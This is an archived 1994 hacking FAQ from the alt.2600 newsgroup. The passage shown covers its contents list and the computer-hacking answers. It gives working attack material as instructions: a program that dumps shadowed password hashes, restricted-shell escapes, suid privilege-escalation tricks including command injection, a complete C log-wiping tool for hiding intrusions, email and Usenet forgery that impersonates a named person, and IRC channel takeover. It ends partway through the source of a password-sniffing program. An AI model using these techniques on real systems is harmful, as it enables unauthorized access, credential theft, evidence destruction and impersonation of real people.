home *** CD-ROM | disk | FTP | other *** search
/ HPAVC / HPAVC CD-ROM.iso / HACKFAQ.ZIP / HACKFAQ.10 < prev   
Internet Message Format  |  1995-02-26  |  176KB

  1. From will@gnu.ai.mit.edu (Will Spencer)
  2. Newsgroups: alt.2600,alt.answers,news.answers
  3. Subject: alt.2600 FAQ, Beta .010 - Part 1/1
  4. Followup-To: alt.2600
  5. Reply-To: will@gnu.ai.mit.edu (FAQ Comments address)
  6. Summary: This posting contains a list of Frequently Asked
  7.      Questions (and their answers) about hacking.  It
  8.      should be read by anyone who wishes to post to the
  9.      alt.2600 newsgroup or use the IRC channel #hack.
  10.  
  11. Archive-name: alt-2600-faq
  12. Posting-Frequency: Random
  13. Last-Modified: 1994/12/18
  14. Version: Beta .010
  15.  
  16.  
  17. Editors Note: Welcome to Beta .010 of the alt.2600/#hack FAQ!
  18.  
  19.               Eleet greets go out to Outsider for producing an
  20.               excellent WWW version of this document at:
  21.               http://www.engin.umich.edu/~jgotts/hack-faq.html
  22.  
  23.               The purpose of this FAQ is to give you a general
  24.               introduction to the topics covered in alt.2600 and
  25.               #hack.  No document will make you a hacker.
  26.  
  27.               If you have a questions regarding any of the topics
  28.               covered in the FAQ, please direct it to alt.2600 or
  29.               #hack.  Please do not e-mail me with them, I'm getting
  30.               swamped.
  31.  
  32.               If your copy of the #hack FAQ does not end with the
  33.               letters EOT on a line by themselves, you do not have the
  34.               entire FAQ.
  35.  
  36.  
  37.                                  ** BETA **
  38.  
  39.                              Beta Revision .010
  40.  
  41.                 alt.2600/#Hack F.A.Q.
  42.  
  43.                         A TNO Communication Production
  44.  
  45.                                     by
  46.                   Voyager
  47.                 will@gnu.ai.mit.edu
  48.  
  49.                 Sysop of
  50.                  Hacker's Haven
  51.                   (303)343-4053
  52.  
  53.                With special thanks to:
  54.  
  55.         A-Flat, Al, Aleph1, Bluesman, C-Curve, DeadKat, Edison,
  56.         Hobbit, KCrow, Major, Marauder, Novocain, Outsider, Presence,
  57.         Rogue Agent, sbin, Taran King, Tomes and TheSaint.
  58.  
  59.  
  60.                We work in the dark
  61.                We do what we can
  62.                We give what we have
  63.                Our doubt is our passion,
  64.                and our passion is our task
  65.                The rest is the madness of art.
  66.  
  67.                 -- Henry James
  68.  
  69.  
  70.  
  71. Section A: Computers
  72.  
  73.   01. How do I access the password file under Unix?
  74. U 02. How do I crack Unix passwords?
  75.   03. What is password shadowing?
  76.   04. Where can I find the password file if it's shadowed?
  77.   05. What is NIS/yp?
  78.   06. What are those weird characters after the comma in my passwd file?
  79.   07. How do I access the password file under VMS?
  80.   08. How do I crack VMS passwords?
  81.   09. How do I break out of a restricted shell?
  82.   10. How do I gain root from a suid script or program?
  83.   11. How do I erase my presence from the system logs?
  84.   12. How do I send fakemail?
  85.   13. How do I fake posts to UseNet?
  86.   14. How do I hack ChanOp on IRC?
  87.   15. How do I modify the IRC client to hide my real username?
  88. U 16. How to I change to directories with strange characters in them?
  89.   17. What is ethernet sniffing?
  90.   18. What is an Internet Outdial?
  91.   19. What are some Internet Outdials?
  92. U 20. What is this system?
  93. U 21. What are the default accounts for XXX ?
  94.   22. What port is XXX on?
  95.   23. What is a trojan/worm/virus/logic bomb?
  96. U 24. How can I protect myself from virii and such?
  97.   25. What is Cryptoxxxxxxx?
  98.   26. What is PGP?
  99. U 27. What is Tempest?
  100.   28. What is an anonymous remailer?
  101.   29. What are the addresses of some anonymous remailers?
  102.   30. How do I defeat copy protection?
  103.   31. What is 127.0.0.1?
  104.  
  105.  
  106. Section B: Telephony
  107.  
  108. U 01. What is a Red Box?
  109. U 02. How do I build a Red Box?
  110.   03. Where can I get a 6.5536Mhz crystal?
  111.   04. Which payphones will a Red Box work on?
  112. N 05. How do I make local calls with a Red Box?
  113. U 06. What is a Blue Box?
  114.   07. Do Blue Boxes still work?
  115.   08. What is a Black Box?
  116. U 09. What do all the colored boxes do?
  117.   10. What is an ANAC number?
  118.   11. What is the ANAC number for my area?
  119.   12. What is a ringback number?
  120. U 13. What is the ringback number for my area?
  121.   14. What is a loop?
  122. U 15. What is a loop in my area?
  123. U 16. What is a CNA number?
  124. U 17. What is the telephone company CNA number for my area?
  125. U 18. What are some numbers that always ring busy?
  126. U 19. What are some numbers that temporarily disconnect phone service?
  127.   20. What is scanning?
  128.   21. Is scanning illegal?
  129.   22. Where can I purchase a lineman's handset?
  130.   23. What are the DTMF frequencies?
  131.   24. What are the frequencies of the telephone tones?
  132. U 25. What are all of the * codes?
  133.   26. What frequencies do cordless phones operate on?
  134.  
  135.  
  136. Section C: Resources
  137.  
  138. U 01. What are some ftp sites of interest to hackers?
  139. U 02. What are some newsgroups of interest to hackers?
  140. U 03. What are some telnet sites of interest to hackers?
  141. U 04. What are some gopher sites of interest to hackers?
  142. U 05. What are some World wide Web (WWW) sites of interest to hackers?
  143.   06. What are some IRC channels of interest to hackers?
  144. U 07. What are some BBS's of interest to hackers?
  145. U 08. What books are available on this subject?
  146. U 09. What are some mailing lists of interest to hackers?
  147. U 10. What are some print magazines of interest to hackers?
  148. U 11. What are some organizations of interest to hackers?
  149.   12. Where can I purchase a magnetic stripe encoder/decoder?
  150. N 13. What are the rainbow books and how can I get them?
  151.  
  152.  
  153. Section D: 2600
  154.  
  155.   01. What is alt.2600?
  156.   02. What does "2600" mean?
  157.   03. Are there on-line versions of 2600 available?
  158.   04. I can't find 2600 at any bookstores.  What can I do?
  159.   05. Why does 2600 cost more to subscribe to than to buy at a newsstand?
  160.  
  161.  
  162. Section E: Miscellaneous
  163.  
  164.   01. What does XXX stand for?
  165.   02. How do I determine if I have a valid credit card number?
  166.   03. What bank issued this credit card?
  167.   04. What are the ethics of hacking?
  168. U 05. Where can I get a copy of the alt.2600/#hack FAQ?
  169.  
  170.  
  171.  
  172. U == Updated since last release of the #hack FAQ
  173. N == New since last release of the #hack FAQ
  174.  
  175.  
  176.  
  177.  
  178. Section A: Computers
  179. ~~~~~~~~~~~~~~~~~~~~
  180.  
  181. 01. How do I access the password file under Unix?
  182.  
  183. In standard Unix the password file is /etc/passwd.  On a Unix system
  184. with either NIS/yp or password shadowing, much of the password data
  185. may be elsewhere.
  186.  
  187.  
  188. 02. How do I crack Unix passwords?
  189.  
  190. Contrary to popular belief, Unix passwords cannot be decrypted.  Unix
  191. passwords are encrypted with a one way function.  The login program
  192. encrypts the text you enter at the "password:" prompt and compares
  193. that encrypted string against the encrypted form of your password.
  194.  
  195. Password cracking software uses wordlists.  Each word in the wordlist
  196. is encrypted and the results are compared to the encrypted form of the
  197. target password.
  198.  
  199. The best cracking program for Unix passwords is currently Crack by
  200. Alec Muffett.  For PC-DOS, the best package to use is currently
  201. CrackerJack.
  202.  
  203.  
  204. 03. What is password shadowing?
  205.  
  206. Password shadowing is a security system where the encrypted password
  207. field of /etc/passwd is replaced with a special token and the
  208. encrypted password is stored in a separate file which is not readable
  209. by normal system users.
  210.  
  211. To defeat password shadowing on many (but not all) systems, write a
  212. program that uses successive calls to getpwent() to obtain the
  213. password file.
  214.  
  215. Example:
  216.  
  217. #include <pwd.h>
  218. main()
  219. {
  220. struct passwd *p;
  221. while(p=getpwent())
  222. printf("%s:%s:%d:%d:%s:%s:%s\n", p->pw_name, p->pw_passwd,
  223. p->pw_uid, p->pw_gid, p->pw_gecos, p->pw_dir, p->pw_shell);
  224. }
  225.  
  226.  
  227. 04. Where can I find the password file if it's shadowed?
  228.  
  229. Unix                  Path                            Token
  230. -----------------------------------------------------------------
  231. AIX 3                 /etc/security/passwd            !
  232.        or             /tcb/auth/files/<first letter   #
  233.                             of username>/<username>
  234. A/UX 3.0s             /tcb/files/auth/?/*
  235. BSD4.3-Reno           /etc/master.passwd              *
  236. ConvexOS 10           /etc/shadpw                     *
  237. ConvexOS 11           /etc/shadow                     *
  238. DG/UX                 /etc/tcb/aa/user/               *
  239. EP/IX                 /etc/shadow                     x
  240. HP-UX                 /.secure/etc/passwd             *
  241. IRIX 5                /etc/shadow                     x
  242. Linux 1.1             /etc/shadow                     *
  243. OSF/1                 /etc/passwd[.dir|.pag]          *
  244. SCO Unix #.2.x        /tcb/auth/files/<first letter   *
  245.                             of username>/<username>
  246. SunOS4.1+c2           /etc/security/passwd.adjunct    ##username
  247. SunOS 5.0             /etc/shadow
  248.                       <optional NIS+ private secure maps/tables/whatever>
  249. System V Release 4.0  /etc/shadow                     x
  250. System V Release 4.2  /etc/security/* database
  251. Ultrix 4              /etc/auth[.dir|.pag]            *
  252. UNICOS                /etc/udb                        *
  253.  
  254.  
  255. 05. What is NIS/yp?
  256.  
  257. NIS (Network Information System) in the current name for what was once
  258. known as yp (Yellow Pages).  The purpose for NIS is to allow many
  259. machines on a network to share configuration information, including
  260. password data.  NIS is not designed to promote system security.  If
  261. your system uses NIS you will have a very short /etc/passwd file that
  262. includes a line that looks like this:
  263.  
  264. +::0:0:::
  265.  
  266. To view the real password file use this command "ypcat passwd"
  267.  
  268.  
  269. 06. What are those weird characters after the comma in my passwd file?
  270.  
  271. The characters are password aging data.  Password aging forces the
  272. user to change passwords after a System Administrator specified period
  273. of time.  Password aging can also force a user to keep a password for
  274. a certain number of weeks before changing it.
  275.  
  276. ]
  277. ] Sample entry from /etc/passwd with password aging installed:
  278. ]
  279. ] will:5fg63fhD3d,M.z8:9406:12:Will Spencer:/home/fsg/will:/bin/bash
  280. ]
  281.  
  282. Note the comma in the encrypted password field.  The characters after
  283. the comma are used by the password aging mechanism.
  284.  
  285. ]
  286. ] Password aging characters from above example:
  287. ]
  288. ] M.z8
  289. ]
  290.  
  291. The four characters are interpreted as follows:
  292.  
  293.   1: Maximum number of weeks a password can be used without changing.
  294.   2: Minimum number of weeks a password must be used before changing.
  295. 3&4: Last time password was changed, in number of weeks since 1970.
  296.  
  297. Three special cases should be noted:
  298.  
  299. If the first and second characters are set to '..' the user will be
  300. forced to change his/her passwd the next time he/she logs in.  The
  301. passwd program will then remove the passwd aging characters, and the
  302. user will not be subjected to password aging requirements again.
  303.  
  304. If the third and fourth characters are set to '..' the user will be
  305. forced to change his/her passwd the next time he/she logs in. Password
  306. aging will then occur as defined by the first and second characters.
  307.  
  308. If the first character (MAX) is less than the second character (MIN),
  309. the user is not allowed to change his/her password.  Only root can
  310. change that users password.
  311.  
  312. It should also be noted that the su command does not check the password
  313. aging data.  An account with an expired password can be su'd to
  314. without being forced to change the password.
  315.  
  316.  
  317.                         Password Aging Codes
  318. +------------------------------------------------------------------------+
  319. |                                                                        |
  320. | Character:  .  /  0  1  2  3  4  5  6  7  8  9  A  B  C  D  E  F  G  H |
  321. |    Number:  0  1  2  3  4  5  6  7  8  9 10 11 12 13 14 15 16 17 18 19 |
  322. |                                                                        |
  323. | Character:  I  J  K  L  M  N  O  P  Q  R  S  T  U  V  W  X  Y  Z  a  b |
  324. |    Number: 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 |
  325. |                                                                        |
  326. | Character:  c  d  e  f  g  h  i  j  k  l  m  n  o  p  q  r  s  t  u  v |
  327. |    Number: 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 |
  328. |                                                                        |
  329. | Character:  w  x  y  z                                                 |
  330. |    Number: 60 61 62 63                                                 |
  331. |                                                                        |
  332. +------------------------------------------------------------------------+
  333.  
  334.  
  335. 07. How do I access the password file under VMS?
  336.  
  337. Under VMS, the password file is SYS$SYSTEM:SYSUAF.DAT.  However,
  338. unlike Unix, most users do not have access to read the password file.
  339.  
  340.  
  341. 08. How do I crack VMS passwords?
  342.  
  343. Write a program that uses the SYS$GETUAF functions to compare the
  344. results of encrypted words against the encrypted data in SYSUAF.DAT.
  345.  
  346. Two such programs are known to exist, CHECK_PASSWORD and
  347. GUESS_PASSWORD.
  348.  
  349.  
  350. 09. How do I break out of a restricted shell?
  351.  
  352. On poorly implemented restricted shells you can break out of the
  353. restricted environment by running a program that features a shell
  354. function.  A good example is vi.  Run vi and use this command:
  355.  
  356. :set shell=/bin/sh
  357.  
  358. then shell using this command:
  359.  
  360. :shell
  361.  
  362.  
  363. 10. How do I gain root from a suid script or program?
  364.  
  365. 1. Change IFS.
  366.  
  367. If the program calls any other programs using the system() function
  368. call, you may be able to fool it by changing IFS.  IFS is the Internal
  369. Field Separator that the shell uses to delimit arguments.
  370.  
  371. If the program contains a line that looks like this:
  372.  
  373. system("/bin/date")
  374.  
  375. and you change IFS to '/' the shell will them interpret the
  376. proceeding line as:
  377.  
  378. bin date
  379.  
  380. Now, if you have a program of your own in the path called "bin" the
  381. suid program will run your program instead of /bin/date.
  382.  
  383. To change IFS, use this command:
  384.  
  385. IFS='/';export IFS      # Bourne Shell
  386. setenv IFS '/'          # C Shell
  387. export IFS='/'          # Korn Shell
  388.  
  389.  
  390. 2. link the script to -i
  391.  
  392. Create a symbolic link named "-i" to the program.  Running "-i"
  393. will cause the interpreter shell (/bin/sh) to start up in interactive
  394. mode.  This only works on suid shell scripts.
  395.  
  396. Example:
  397.  
  398. % ln suid.sh -i
  399. % -i
  400. #
  401.  
  402.  
  403. 3. Exploit a race condition
  404.  
  405. Replace a symbolic link to the program with another program while the
  406. kernel is loading /bin/sh.
  407.  
  408. Example:
  409.  
  410. nice -19 suidprog ; ln -s evilprog suidroot
  411.  
  412.  
  413. 4. Send bad input to the program.
  414.  
  415. Invoke the name of the program and a separate command on the same
  416. command line.
  417.  
  418. Example:
  419.  
  420. suidprog ; id
  421.  
  422.  
  423. 11. How do I erase my presence from the system logs?
  424.  
  425. Edit /etc/utmp, /usr/adm/wtmp and /usr/adm/lastlog. These are not text
  426. files that can be edited by hand with vi, you must use a program
  427. specifically written for this purpose.
  428.  
  429. Example:
  430.  
  431. #include <sys/types.h>
  432. #include <stdio.h>
  433. #include <unistd.h>
  434. #include <sys/file.h>
  435. #include <fcntl.h>
  436. #include <utmp.h>
  437. #include <pwd.h>
  438. #include <lastlog.h>
  439. #define WTMP_NAME "/usr/adm/wtmp"
  440. #define UTMP_NAME "/etc/utmp"
  441. #define LASTLOG_NAME "/usr/adm/lastlog"
  442.  
  443. int f;
  444.  
  445. void kill_utmp(who)
  446. char *who;
  447. {
  448.     struct utmp utmp_ent;
  449.  
  450.   if ((f=open(UTMP_NAME,O_RDWR))>=0) {
  451.      while(read (f, &utmp_ent, sizeof (utmp_ent))> 0 )
  452.        if (!strncmp(utmp_ent.ut_name,who,strlen(who))) {
  453.                  bzero((char *)&utmp_ent,sizeof( utmp_ent ));
  454.                  lseek (f, -(sizeof (utmp_ent)), SEEK_CUR);
  455.                  write (f, &utmp_ent, sizeof (utmp_ent));
  456.             }
  457.      close(f);
  458.   }
  459. }
  460.  
  461. void kill_wtmp(who)
  462. char *who;
  463. {
  464.     struct utmp utmp_ent;
  465.     long pos;
  466.  
  467.     pos = 1L;
  468.     if ((f=open(WTMP_NAME,O_RDWR))>=0) {
  469.  
  470.      while(pos != -1L) {
  471.         lseek(f,-(long)( (sizeof(struct utmp)) * pos),L_XTND);
  472.         if (read (f, &utmp_ent, sizeof (struct utmp))<0) {
  473.           pos = -1L;
  474.         } else {
  475.           if (!strncmp(utmp_ent.ut_name,who,strlen(who))) {
  476.                bzero((char *)&utmp_ent,sizeof(struct utmp ));
  477.                lseek(f,-( (sizeof(struct utmp)) * pos),L_XTND);
  478.                write (f, &utmp_ent, sizeof (utmp_ent));
  479.                pos = -1L;
  480.           } else pos += 1L;
  481.         }
  482.      }
  483.      close(f);
  484.   }
  485. }
  486.  
  487. void kill_lastlog(who)
  488. char *who;
  489. {
  490.     struct passwd *pwd;
  491.     struct lastlog newll;
  492.  
  493.      if ((pwd=getpwnam(who))!=NULL) {
  494.  
  495.         if ((f=open(LASTLOG_NAME, O_RDWR)) >= 0) {
  496.             lseek(f, (long)pwd->pw_uid * sizeof (struct lastlog), 0);
  497.             bzero((char *)&newll,sizeof( newll ));
  498.             write(f, (char *)&newll, sizeof( newll ));
  499.             close(f);
  500.         }
  501.  
  502.     } else printf("%s: ?\n",who);
  503. }
  504.  
  505. main(argc,argv)
  506. int argc;
  507. char *argv[];
  508. {
  509.     if (argc==2) {
  510.         kill_lastlog(argv[1]);
  511.         kill_wtmp(argv[1]);
  512.         kill_utmp(argv[1]);
  513.         printf("Zap2!\n");
  514.     } else
  515.     printf("Error.\n");
  516. }
  517.  
  518.  
  519. 12. How do I send fakemail?
  520.  
  521. Telnet to port 25 of the machine you want the mail to appear to
  522. originate from.  Enter your message as in this example:
  523.  
  524.  HELO bellcore.com
  525.  MAIL FROM:Voyager@bellcore.com
  526.  RCPT TO:president@whitehouse.gov
  527.  DATA
  528.  
  529.     Please discontinue your silly Clipper initiative.
  530.  .
  531.  QUIT
  532.  
  533. On systems that have RFC 931 implemented, spoofing your "MAIL FROM:"
  534. line will not work.  Test by sending yourself fakemail first.
  535.  
  536. For more informationm read RFC 822 "Standard for the format of ARPA
  537. Internet text messages."
  538.  
  539.  
  540. 13. How do I fake posts to UseNet?
  541.  
  542. Use inews to post.  Give inews the following lines:
  543.  
  544.  From:
  545.  Newsgroups:
  546.  Subject:
  547.  Message-ID:
  548.  Date:
  549.  Organization:
  550.  
  551. For a moderated newsgroup, inews will also require this line:
  552.  
  553.  Approved:
  554.  
  555. Then add your post and terminate with <Control-D>.
  556.  
  557. Example:
  558.  
  559.  From: Eric S. Real
  560.  Newsgroups: alt.hackers
  561.  Subject: Pathetic bunch of wannabe losers
  562.  Message-ID: <esr.123@locke.ccil.org>
  563.  Date: Fri, 13 Aug 1994 12:15:03
  564.  Organization: Moral Majority
  565.  
  566.  A pathetic bunch of wannabe losers is what most of you are, with no
  567.  right to steal the honorable title of `hacker' to puff up your silly
  568.  adolescent egos. Get stuffed, get lost, and go to jail.
  569.  
  570.                                         Eric S. Real <esr@locke.ccil.org>
  571.  
  572.  
  573.  ^D
  574.  
  575. Note that many systems will append an Originator: line to your message
  576. header, effectively revealing the account from which the message was
  577. posted.
  578.  
  579.  
  580. 14. How do I hack ChanOp on IRC?
  581.  
  582. Find a server that is split from the rest of IRC and create your own
  583. channel there using the name of the channel you want ChanOp on.  When
  584. that server reconnects to the net, you will have ChanOp on the real
  585. channel.  If you have ServerOp on a server, you can cause it to split
  586. on purpose.
  587.  
  588.  
  589. 15. How do I modify the IRC client to hide my real username?
  590.  
  591. Get the IRC client from cs.bu.edu /irc/clients.  Look at the source
  592. code files irc.c and ctcp.c.  The code you are looking for is fairly
  593. easy to spot.  Change it. Change the username code in irc.c and the
  594. ctcp information code in ctcp.c.  Compile and run your client.
  595.  
  596. Here are the diffs from a sample hack of the IRC client.  Your client
  597. code will vary slightly depending on what IRC client version you are
  598. running.
  599.  
  600. *** ctcp.c.old  Wed Feb 10 10:08:05 1993
  601. --- ctcp.c      Fri Feb 12 04:33:55 1993
  602. ***************
  603. *** 331,337 ****
  604.     struct  passwd  *pwd;
  605.     long    diff;
  606.     int     uid;
  607. !       char    c;
  608.   
  609.     /*
  610.      * sojge complained that ircII says 'idle 1 seconds'
  611. --- 331,337 ----
  612.     struct  passwd  *pwd;
  613.     long    diff;
  614.     int     uid;
  615. !       char    c, *fing;
  616.   
  617.     /*
  618.      * sojge complained that ircII says 'idle 1 seconds'
  619. ***************
  620. *** 348,354 ****
  621.     if (uid != DAEMON_UID)
  622.     {
  623.   #endif /* DAEMON_UID */       
  624. !               if (pwd = getpwuid(uid))
  625.         {
  626.             char    *tmp;
  627.   
  628. --- 348,356 ----
  629.     if (uid != DAEMON_UID)
  630.     {
  631.   #endif /* DAEMON_UID */       
  632. !               if (fing = getenv("IRCFINGER"))
  633. !                       send_ctcp_reply(from, ctcp->name, fing, diff, c);
  634. !               else if (pwd = getpwuid(uid))
  635.         {
  636.             char    *tmp;
  637.   
  638. *** irc.c.old   Wed Feb 10 06:33:11 1993
  639. --- irc.c       Fri Feb 12 04:02:11 1993
  640. ***************
  641. *** 510,516 ****
  642.         malloc_strcpy(&my_path, "/");
  643.     if (*realname == null(char))
  644.         strmcpy(realname, "*Unknown*", REALNAME_LEN);
  645. !       if (*username == null(char))
  646.     {
  647.         if (ptr = getenv("USER"))
  648.             strmcpy(username, ptr, NAME_LEN);
  649. --- 510,518 ----
  650.         malloc_strcpy(&my_path, "/");
  651.     if (*realname == null(char))
  652.         strmcpy(realname, "*Unknown*", REALNAME_LEN);
  653. !       if (ptr = getenv("IRCUSER"))
  654. !               strmcpy(username, ptr, NAME_LEN);
  655. !       else if (*username == null(char))
  656.     {
  657.         if (ptr = getenv("USER"))
  658.             strmcpy(username, ptr, NAME_LEN);
  659.  
  660.  
  661. 16. How to I change to directories with strange characters in them?
  662.  
  663. These directories are often used by people trying to hide information,
  664. most often warez (commercial software).
  665.  
  666. There are several things you can do to determine what these strange
  667. characters are.  One is to use the arguments to the ls command that
  668. cause ls to give you more information:
  669.  
  670. From the man page for ls:
  671.  
  672.     -F   Causes directories to be marked with a trailing ``/'',
  673.      executable files to be marked with a trailing ``*'', and
  674.      symbolic links to be marked with a trailing ``@'' symbol.
  675.  
  676.     -q   Forces printing of non-graphic characters in filenames as the
  677.      character ``?''.
  678.  
  679.     -b   Forces printing of non-graphic characters in the \ddd
  680.      notation, in octal.
  681.  
  682. Perhaps the most useful tool is to simply do an "ls -al filename" to
  683. save the directory of the remote ftp site as a file on your local
  684. machine.  Then you can do a "cat -t -v -e filename" too see exactly
  685. what those bizarre little characters are.
  686.  
  687. From the man page for cat:
  688.  
  689.     -v  Causes non-printing characters (with the exception of tabs,
  690.     newlines, and form feeds) to be displayed.  Control characters
  691.     are displayed as ^X (<Ctrl>x), where X is the key pressed with
  692.     the <Ctrl> key (for example, <Ctrl>m is displayed as ^M).  The
  693.     <Del> character (octal 0177) is printed as ^?.  Non-ASCII
  694.     characters (with the high bit set) are printed as M -x, where
  695.     x is the character specified by the seven low order bits.
  696.  
  697.     -t  Causes tabs to be printed as ^I and form feeds as ^L.  This
  698.     option is ignored if the -v option is not specified.
  699.  
  700.     -e  Causes a ``$'' character to be printed at the end of each line
  701.     (prior to the new-line).  This option is ignored if the -v
  702.     option is not set.
  703.  
  704. If the directory name includes a <SPACE> or a <TAB> you will need to
  705. enclose the entire directory name in quotes.  Example:
  706.  
  707. cd "..<TAB>"
  708.  
  709. On an IBM-PC, you may enter these special characters by holding down
  710. the <ALT> key and entering the decimal value of the special character
  711. on your numeric keypad.  When you release the <ALT> key, the special
  712. character should appear on your screen.  An ASCII chart can be very
  713. helpful.
  714.  
  715. Sometimes people will create directories with some of the standard
  716. stty control characters in them, such as ^Z (suspend) or ^C (intr).
  717. To get into those directories, you will first need to user stty to
  718. change the control character in qustion to another character.
  719.  
  720. From the man page for stty:
  721.  
  722.     Control assignments
  723.  
  724.     control-character C
  725.                       Sets control-character to C, where control-character is
  726.                       erase, kill, intr (interrupt), quit, eof, eol, swtch
  727.                       (switch), start, stop or susp.
  728.  
  729.                       start and stop are available as possible control char-
  730.                       acters for the control-character C assignment.
  731.  
  732.                       If C is preceded by a caret (^) (escaped from the
  733.                       shell), then the value used is the corresponding con-
  734.                       trol character (for example, ^D is a <Ctrl>d; ^? is
  735.                       interpreted as DELETE and ^- is interpreted as unde-
  736.                       fined).
  737.  
  738. Use the stty -a command to see your current stty settings, and to
  739. determine which one is causing you problems.
  740.  
  741.  
  742. 17. What is ethernet sniffing?
  743.  
  744. Ethernet sniffing is listening (with software) to the raw ethernet
  745. device for packets that interest you.  When your software sees a
  746. packet that fits certain criteria, it logs it to a file.  The most
  747. common criteria for an interesting packet is one that contains words
  748. like "login" or "password."
  749.  
  750. Many ethernet sniffers are available, here are a few that may be on
  751. your system now:
  752.  
  753. OS              Sniffer
  754. ~~              ~~~~~~~
  755. HP/UX           nettl (monitor) & netfmt (display)
  756.                 nfswatch        /* Available via anonymous ftp           */
  757. Irix            nfswatch        /* Available via anonymous ftp           */
  758.                 Etherman
  759. SunOS           etherfind
  760.                 nfswatch        /* Available via anonymous ftp           */
  761. Solaris         snoop
  762. DOS             ETHLOAD         /* Available via anonymous ftp as        */
  763.                                 /* ethld104.zip                          */
  764.                 The Gobbler     /* Available via anonymous ftp           */
  765.                 LanPatrol
  766.                 LanWatch
  767.         Netmon
  768.                 Netwatch
  769.                 Netzhack        /* Available via anonymous ftp at        */
  770.                                 /* mistress.informatik.unibw-muenchen.de */
  771.                                 /* /pub/netzhack.mac                     */
  772. Macintosh       Etherpeek
  773.  
  774. Here is source code for an ethernet sniffer:
  775.  
  776. /* Esniff.c */
  777.  
  778. #include <stdio.h>
  779. #include <ctype.h>
  780. #include <string.h>
  781.  
  782. #include <sys/time.h>
  783. #include <sys/file.h>
  784. #include <sys/stropts.h>
  785. #include <sys/signal.h>
  786. #include <sys/types.h>
  787. #include <sys/socket.h>
  788. #include <sys/ioctl.h>
  789.  
  790. #include <net/if.h>
  791. #include <net/nit_if.h>
  792. #include <net/nit_buf.h>
  793. #include <net/if_arp.h>
  794.  
  795. #include <netinet/in.h>
  796. #include <netinet/if_ether.h>
  797. #include <netinet/in_systm.h>
  798. #include <netinet/ip.h>
  799. #include <netinet/udp.h>
  800. #include <netinet/ip_var.h>
  801. #include <netinet/udp_var.h>
  802. #include <netinet/in_systm.h>
  803. #include <netinet/tcp.h>
  804. #include <netinet/ip_icmp.h>
  805.  
  806. #include <netdb.h>
  807. #include <arpa/inet.h>
  808.  
  809. #define ERR stderr
  810.  
  811. char    *malloc();
  812. char    *device,
  813.         *ProgName,
  814.         *LogName;
  815. FILE    *LOG;
  816. int     debug=0;
  817.  
  818. #define NIT_DEV     "/dev/nit"
  819. #define CHUNKSIZE   4096        /* device buffer size */
  820. int     if_fd = -1;
  821. int     Packet[CHUNKSIZE+32];
  822.  
  823. void Pexit(err,msg)
  824. int err; char *msg;
  825. { perror(msg);
  826.   exit(err); }
  827.  
  828. void Zexit(err,msg)
  829. int err; char *msg;
  830. { fprintf(ERR,msg);
  831.   exit(err); }
  832.  
  833. #define IP          ((struct ip *)Packet)
  834. #define IP_OFFSET   (0x1FFF)
  835. #define SZETH       (sizeof(struct ether_header))
  836. #define IPLEN       (ntohs(ip->ip_len))
  837. #define IPHLEN      (ip->ip_hl)
  838. #define TCPOFF      (tcph->th_off)
  839. #define IPS         (ip->ip_src)
  840. #define IPD         (ip->ip_dst)
  841. #define TCPS        (tcph->th_sport)
  842. #define TCPD        (tcph->th_dport)
  843. #define IPeq(s,t)   ((s).s_addr == (t).s_addr)
  844.  
  845. #define TCPFL(FLAGS) (tcph->th_flags & (FLAGS))
  846.  
  847. #define MAXBUFLEN  (128)
  848. time_t  LastTIME = 0;
  849.  
  850. struct CREC {
  851.      struct CREC *Next,
  852.                  *Last;
  853.      time_t  Time;              /* start time */
  854.      struct in_addr SRCip,
  855.                     DSTip;
  856.      u_int   SRCport,           /* src/dst ports */
  857.              DSTport;
  858.      u_char  Data[MAXBUFLEN+2]; /* important stuff :-) */
  859.      u_int   Length;            /* current data length */
  860.      u_int   PKcnt;             /* # pkts */
  861.      u_long  LASTseq;
  862. };
  863.  
  864. struct CREC *CLroot = NULL;
  865.  
  866. char *Symaddr(ip)
  867. register struct in_addr ip;
  868. { register struct hostent *he =
  869.       gethostbyaddr((char *)&ip.s_addr, sizeof(struct in_addr),AF_INET);
  870.  
  871.   return( (he)?(he->h_name):(inet_ntoa(ip)) );
  872. }
  873.  
  874. char *TCPflags(flgs)
  875. register u_char flgs;
  876. { static char iobuf[8];
  877. #define SFL(P,THF,C) iobuf[P]=((flgs & THF)?C:'-')
  878.  
  879.   SFL(0,TH_FIN, 'F');
  880.   SFL(1,TH_SYN, 'S');
  881.   SFL(2,TH_RST, 'R');
  882.   SFL(3,TH_PUSH,'P');
  883.   SFL(4,TH_ACK, 'A');
  884.   SFL(5,TH_URG, 'U');
  885.   iobuf[6]=0;
  886.   return(iobuf);
  887. }
  888.  
  889. char *SERVp(port)
  890. register u_int port;
  891. { static char buf[10];
  892.   register char *p;
  893.  
  894.    switch(port) {
  895.      case IPPORT_LOGINSERVER: p="rlogin"; break;
  896.      case IPPORT_TELNET:      p="telnet"; break;
  897.      case IPPORT_SMTP:        p="smtp"; break;
  898.      case IPPORT_FTP:         p="ftp"; break;
  899.      default: sprintf(buf,"%u",port); p=buf; break;
  900.    }
  901.    return(p);
  902. }
  903.  
  904. char *Ptm(t)
  905. register time_t *t;
  906. { register char *p = ctime(t);
  907.   p[strlen(p)-6]=0; /* strip " YYYY\n" */
  908.   return(p);
  909. }
  910.  
  911. char *NOWtm()
  912. { time_t tm;
  913.   time(&tm);
  914.   return( Ptm(&tm) );
  915. }
  916.  
  917. #define MAX(a,b) (((a)>(b))?(a):(b))
  918. #define MIN(a,b) (((a)<(b))?(a):(b))
  919.  
  920. /* add an item */
  921. #define ADD_NODE(SIP,DIP,SPORT,DPORT,DATA,LEN) { \
  922.   register struct CREC *CLtmp = \
  923.         (struct CREC *)malloc(sizeof(struct CREC)); \
  924.   time( &(CLtmp->Time) ); \
  925.   CLtmp->SRCip.s_addr = SIP.s_addr; \
  926.   CLtmp->DSTip.s_addr = DIP.s_addr; \
  927.   CLtmp->SRCport = SPORT; \
  928.   CLtmp->DSTport = DPORT; \
  929.   CLtmp->Length = MIN(LEN,MAXBUFLEN); \
  930.   bcopy( (u_char *)DATA, (u_char *)CLtmp->Data, CLtmp->Length); \
  931.   CLtmp->PKcnt = 1; \
  932.   CLtmp->Next = CLroot; \
  933.   CLtmp->Last = NULL; \
  934.   CLroot = CLtmp; \
  935. }
  936.  
  937. register struct CREC *GET_NODE(Sip,SP,Dip,DP)
  938. register struct in_addr Sip,Dip;
  939. register u_int SP,DP;
  940. { register struct CREC *CLr = CLroot;
  941.  
  942.   while(CLr != NULL) {
  943.     if( (CLr->SRCport == SP) && (CLr->DSTport == DP) &&
